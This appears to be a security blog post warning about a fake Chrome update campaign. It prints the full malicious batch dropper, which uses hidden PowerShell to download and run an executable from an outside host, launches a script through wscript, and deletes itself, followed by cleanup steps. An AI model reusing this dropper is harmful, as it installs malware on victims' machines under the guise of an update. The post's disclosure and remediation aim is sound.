The Critical Chrome Update Malware Attack has been going around and getting through many antivirus solutions. Do not click Download now button.
What does this do? A brief analysis
The download now button downloads the following chrome_update.bat file
chrome_update.bat contents
Full analysis of this payload chrome_update.bat at Payload Security.
More information about install_flash.js at Payload Security.
What to do if you did click "Download Now" button?
1. Run Bleeping Computer's Rkill . Do not reboot after.
Then run Malwarebytes Adwcleaner. Reboot (will be asked).
2. Run Bleeping Computer's Rkill, then run Malwarebytes JRT in same session.
3. Run Malwarebytes
4. Run Hitman Pro
5. Run Windows Defender in Win 8+ or Windows Security Essentials for Win 7 or less.
6. Run free Kaspersky Security Scan get it here
7. Run free Kaspersky Anti-Ransom-ware Tool get it here
8. Run your Anti-Virus Solution in Deep Scan Mode
9. Clear your Chrome Cache
What does this do? A brief analysis
The download now button downloads the following chrome_update.bat file
- The script attempts to run using a Powershell command to downloads a file .dat and renames it into a randomly named .exe file.
- Which then runs this file in the background, and attempts to injection script in current running processes.
- Then you are notified that the "Update Complete" with an OK dissipate button.
- By saying click Ok, your installing the install_flash.js which contains VB script.
chrome_update.bat contents
1
2
3
4
5
6
7
8
9
10
| @echo off
echo a=new ActiveXObject('Wscript.Shell');
a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\16330788701ac441736751e3ee3c6996.exe';
(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);
Start-Process $d;
[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');
[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
>"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0"
|
Full analysis of this payload chrome_update.bat at Payload Security.
More information about install_flash.js at Payload Security.
What to do if you did click "Download Now" button?
1. Run Bleeping Computer's Rkill . Do not reboot after. Then run Malwarebytes Adwcleaner. Reboot (will be asked).
2. Run Bleeping Computer's Rkill, then run Malwarebytes JRT in same session.
3. Run Malwarebytes
4. Run Hitman Pro
5. Run Windows Defender in Win 8+ or Windows Security Essentials for Win 7 or less.
6. Run free Kaspersky Security Scan get it here
7. Run free Kaspersky Anti-Ransom-ware Tool get it here
8. Run your Anti-Virus Solution in Deep Scan Mode
9. Clear your Chrome Cache
Open Chrome.
- On your browser toolbar, click More
.
- Point to More tools, and then click Clear browsing data.
- In the "Clear browsing data" box, click the check box only for Cached images and files.
- Use the menu at the top to select the amount of data that you want to delete. Choose beginning of time to delete everything.
- Click Clear browsing data button
10. Review your cookies in Google Chrome
No comments:
Post a Comment